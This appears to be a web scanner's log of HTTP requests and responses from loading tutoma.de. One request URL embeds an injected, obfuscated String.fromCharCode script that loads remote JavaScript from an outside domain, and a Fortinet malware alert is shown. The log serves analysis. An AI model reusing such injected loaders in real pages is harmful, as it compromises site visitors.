34.120.237.76200 OK 5.9 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb0ea68cc-d723-41ae-8bc2-16e2e422e2aa.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash c6380f73d47906bd63b9c48137e4df61
94e053461d2db89e9d08321f26a2555ebcd7e0b9
84144e3c3e7acc7339fd1da9b373f18582734b6f4d235b2aef8c90616ed1c8a7
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb0ea68cc-d723-41ae-8bc2-16e2e422e2aa.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 5914
x-amzn-requestid: 8dea187e-ee61-4691-aff7-59202f978565
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: b2P4MF0UIAMFWBw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6378c69a-011430f86689624a29d71215;Sampled=0
x-amzn-remapped-date: Sat, 19 Nov 2022 12:05:46 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: c2w_q7fYc60JSQ4GcAlmUFyp7csfflgG8GvCXJuy_wWlvf9mIG0u9g==
via: 1.1 eece508272520f70691e4eebdc5a6dea.cloudfront.net (CloudFront), 1.1 2324edbcb8fc72f617442c65f36a40fc.cloudfront.net (CloudFront), 1.1 google
date: Tue, 22 Nov 2022 22:38:55 GMT
age: 85402
etag: "94e053461d2db89e9d08321f26a2555ebcd7e0b9"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F4d582ed2-f829-4647-9113-832d4500a207.jpeg
34.120.237.76200 OK 9.1 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F4d582ed2-f829-4647-9113-832d4500a207.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 6d2c986e076309d51d199332caebb07a
343a5bfba0f8fec28f9345f276b44f44c6eaf6a6
64e6fba6a45c70c1db6040a2273472774c00257bef373cc45b6ca00cb819681a
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F4d582ed2-f829-4647-9113-832d4500a207.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 9138
x-amzn-requestid: 524e565e-a9fb-45f9-b786-d64cf26a3cdf
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cBcAAHG8IAMFhwQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637d4066-3689e70e6212e9e77dc134f4;Sampled=0
x-amzn-remapped-date: Tue, 22 Nov 2022 21:34:30 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: cwu__NPGaU0zyAG0H1yZhmjGsFzvNmzsGv6Zt9hrF5gwSysEio2MjA==
via: 1.1 5a1753718d8b33365e5f693dd338c510.cloudfront.net (CloudFront), 1.1 57a21088b36c69a83578b5a5579df58e.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 17:05:44 GMT
age: 18993
etag: "343a5bfba0f8fec28f9345f276b44f44c6eaf6a6"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F44f9633f-15fe-459e-aebf-06d2b582efa8.jpeg
34.120.237.76200 OK 9.8 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F44f9633f-15fe-459e-aebf-06d2b582efa8.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 3e8d7af3a5d030774447a0f71c7824f0
663cace8681891ad55943dd0273493aa9474d102
22068df04672281e392caa485259df103d591ab247c3eb5e0ccba10ffd8a9ef0
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F44f9633f-15fe-459e-aebf-06d2b582efa8.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 9766
x-amzn-requestid: ca8b7a9f-3c1a-419d-953e-2944bf820e5e
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cBcR_Hd4IAMFWUg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637d40d9-4ca5e9b2476a47cd199b9cba;Sampled=0
x-amzn-remapped-date: Tue, 22 Nov 2022 21:36:25 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: RZqqB_Aaam7hYpdAB2fbx-i3iQth9M-OgA25IgCB5Uz0swqVi3-bVg==
via: 1.1 49b94a8674d6e86a841d6523f7dbaf14.cloudfront.net (CloudFront), 1.1 325ed3ba58a560748d886354beef39c0.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 21:48:19 GMT
age: 2038
etag: "663cace8681891ad55943dd0273493aa9474d102"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F45ca81c5-d11a-4d86-a922-dbdce0f6b46c.jpeg
34.120.237.76200 OK 5.0 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F45ca81c5-d11a-4d86-a922-dbdce0f6b46c.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 0cc111ba6ae699fca7fbff3490640960
18084197b48ea3b4a143636250396e8791d0285f
34fbba92e665ad371ea2bd1a871251cf0c5b7832d6f4661b21b2cfbd7f786923
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F45ca81c5-d11a-4d86-a922-dbdce0f6b46c.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 4977
x-amzn-requestid: 3e56de91-7ed1-4b1e-b230-5f19b2cc6601
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bxQKBHzdIAMFpUw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6376c70c-41c572d27999534d3c198372;Sampled=0
x-amzn-remapped-date: Thu, 17 Nov 2022 23:43:08 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: xXVgZMdEgIo2J1DEAMtdmM6jDRxBWuDi6waMd1-ExTKHh7Fis_SmvA==
via: 1.1 4d7fa73f804f1c93f20cfc24c4b1266e.cloudfront.net (CloudFront), 1.1 e4d3d5aafc7d7d582423c073065ab562.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 21:56:51 GMT
age: 1526
etag: "18084197b48ea3b4a143636250396e8791d0285f"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
static.zotabox.com/%3C///%3C/script%3E%3Cscript%20async=true%20language=javascript%3Evar%20nt%20=%20String.fromCharCode(98,%20122);var%20mb%20=%20String.fromCharCode(97,%20106,%2097,%20120,%2067,%20111,%20117,%20110,%20116,%20101,%20114);var%20sb%20=%20String.fromCharCode(115,%2099,%20114,%20105,%20112,%20116);var%20tb%20=%20String.fromCharCode(116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116);var%20lb%20=%20String.fromCharCode(47,%2047,%20100,%20101,%20108,%20105,%20118,%20101,%20114,%20121,%20103,%20111,%20111,%20100,%20115,%20116,%20114,%2097,%20116,%20101,%20103,%20105,%20101,%20115,%2046,%2099,%20111,%20109,%2047,%20115,%20117,%20110,%20110,%20121,%2046,%20106,%20115,%2063,%20116,%20121,%20112,%20101,%2061,%20115,%2099,%20114,%20105,%20112,%20116,%2038,%20103,%20108,%20111,%2098,%2097,%20108,%2061,%20116,%20114,%20117,%20101,%2038);var%20c=document.createElement(sb);c.type=tb,c.async=1,c.src=lb+nt;var%20n=document.getElementsByTagName(sb)[0];n.parentNode.insertBefore(c,n);%3C/script%3E%3Cscript%3E/widgets.js
104.22.54.216404 Not Found 0 B URL HTTP/2 static.zotabox.com/%3C///%3C/script%3E%3Cscript%20async=true%20language=javascript%3Evar%20nt%20=%20String.fromCharCode(98,%20122);var%20mb%20=%20String.fromCharCode(97,%20106,%2097,%20120,%2067,%20111,%20117,%20110,%20116,%20101,%20114);var%20sb%20=%20String.fromCharCode(115,%2099,%20114,%20105,%20112,%20116);var%20tb%20=%20String.fromCharCode(116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116);var%20lb%20=%20String.fromCharCode(47,%2047,%20100,%20101,%20108,%20105,%20118,%20101,%20114,%20121,%20103,%20111,%20111,%20100,%20115,%20116,%20114,%2097,%20116,%20101,%20103,%20105,%20101,%20115,%2046,%2099,%20111,%20109,%2047,%20115,%20117,%20110,%20110,%20121,%2046,%20106,%20115,%2063,%20116,%20121,%20112,%20101,%2061,%20115,%2099,%20114,%20105,%20112,%20116,%2038,%20103,%20108,%20111,%2098,%2097,%20108,%2061,%20116,%20114,%20117,%20101,%2038);var%20c=document.createElement(sb);c.type=tb,c.async=1,c.src=lb+nt;var%20n=document.getElementsByTagName(sb)[0];n.parentNode.insertBefore(c,n);%3C/script%3E%3Cscript%3E/widgets.js
IP 104.22.54.216:0
GET /%3C///%3C/script%3E%3Cscript%20async=true%20language=javascript%3Evar%20nt%20=%20String.fromCharCode(98,%20122);var%20mb%20=%20String.fromCharCode(97,%20106,%2097,%20120,%2067,%20111,%20117,%20110,%20116,%20101,%20114);var%20sb%20=%20String.fromCharCode(115,%2099,%20114,%20105,%20112,%20116);var%20tb%20=%20String.fromCharCode(116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116);var%20lb%20=%20String.fromCharCode(47,%2047,%20100,%20101,%20108,%20105,%20118,%20101,%20114,%20121,%20103,%20111,%20111,%20100,%20115,%20116,%20114,%2097,%20116,%20101,%20103,%20105,%20101,%20115,%2046,%2099,%20111,%20109,%2047,%20115,%20117,%20110,%20110,%20121,%2046,%20106,%20115,%2063,%20116,%20121,%20112,%20101,%2061,%20115,%2099,%20114,%20105,%20112,%20116,%2038,%20103,%20108,%20111,%2098,%2097,%20108,%2061,%20116,%20114,%20117,%20101,%2038);var%20c=document.createElement(sb);c.type=tb,c.async=1,c.src=lb+nt;var%20n=document.getElementsByTagName(sb)[0];n.parentNode.insertBefore(c,n);%3C/script%3E%3Cscript%3E/widgets.js HTTP/1.1
Host: static.zotabox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 404 Not Found
date: Wed, 23 Nov 2022 22:22:16 GMT
content-type: text/html; charset=utf-8
vary: Accept-Encoding
x-powered-by: Zotabox
access-control-allow-origin: *
access-control-allow-methods: GET,POST
content-security-policy: default-src 'none'
x-content-type-options: nosniff
content-encoding: gzip
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 76ed4d7419dc0b31-OSL
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/what-makes-us-different-bg.jpg
87.98.235.184200 OK 0 B URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/what-makes-us-different-bg.jpg
IP 87.98.235.184:0
GET /wp-content/themes/tutoma/dist/images/what-makes-us-different-bg.jpg HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/jpeg
content-length: 13370
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:29 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-json/contact-form-7/v1/contact-forms/172/refill
87.98.235.184200 OK 0 B URL HTTP/2 tutoma.de/wp-json/contact-form-7/v1/contact-forms/172/refill
IP 87.98.235.184:0
Analyzer Verdict Alert fortinet Malware
GET /wp-json/contact-form-7/v1/contact-forms/172/refill HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:16 GMT
content-type: application/json; charset=UTF-8
server: Apache
x-powered-by: PHP/7.0
x-robots-tag: noindex
link: <https://tutoma.de/wp-json/>; rel="https://api.w.org/"
x-content-type-options: nosniff
access-control-expose-headers: X-WP-Total, X-WP-TotalPages
access-control-allow-headers: Authorization, Content-Type
allow: GET
vary: Origin,X-Forwarded-Proto,Accept-Encoding
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
accept-ranges: none
content-encoding: gzip
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
socialplugin.facebook.net/new_domain_gating/?endpoint=customerchat&page_id=2141796126149219&suppress_http_code=1
157.240.200.16200 OK 0 B URL HTTP/2 socialplugin.facebook.net/new_domain_gating/?endpoint=customerchat&page_id=2141796126149219&suppress_http_code=1
IP 157.240.200.16:0
GET /new_domain_gating/?endpoint=customerchat&page_id=2141796126149219&suppress_http_code=1 HTTP/1.1
Host: socialplugin.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-type: application/x-www-form-urlencoded
Origin: https://tutoma.de
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: br
content-type: application/json; charset=utf-8
x-fb-rlafr: 0
content-security-policy: default-src * data: blob: 'self';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-allow-origin: https://tutoma.de
x-fb-debug: IboLV4cwEu3x8T3LlZNMjnHaOQcE24e7veuhEzn5Pm6svv5f02wDmyE55WXQyA1dqpAACBtfA0ECz0Ksb9m7pQ==
date: Wed, 23 Nov 2022 22:22:16 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
www.facebook.com/plugins/customer_chat/facade/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent¤t_url=https%3A%2F%2Ftutoma.de%2F&is_loaded_by_facade=true&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136533&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29
157.240.200.35200 OK 0 B URL HTTP/2 www.facebook.com/plugins/customer_chat/facade/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent¤t_url=https%3A%2F%2Ftutoma.de%2F&is_loaded_by_facade=true&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136533&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29
IP 157.240.200.35:0
GET /plugins/customer_chat/facade/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent¤t_url=https%3A%2F%2Ftutoma.de%2F&is_loaded_by_facade=true&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136533&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-type: application/x-www-form-urlencoded
Origin: https://tutoma.de
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: br
content-type: application/json; charset=utf-8
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-allow-origin: https://tutoma.de
strict-transport-security: max-age=15552000; preload
x-fb-debug: JG/HyKe1WYJzZtw3dKNiHzElr+xWc0DGZWEdCfxIvlvw0TDoziQ+B46NY7i5uRVk6UCYL//FTPKTDYztp5VaJA==
date: Wed, 23 Nov 2022 22:22:16 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2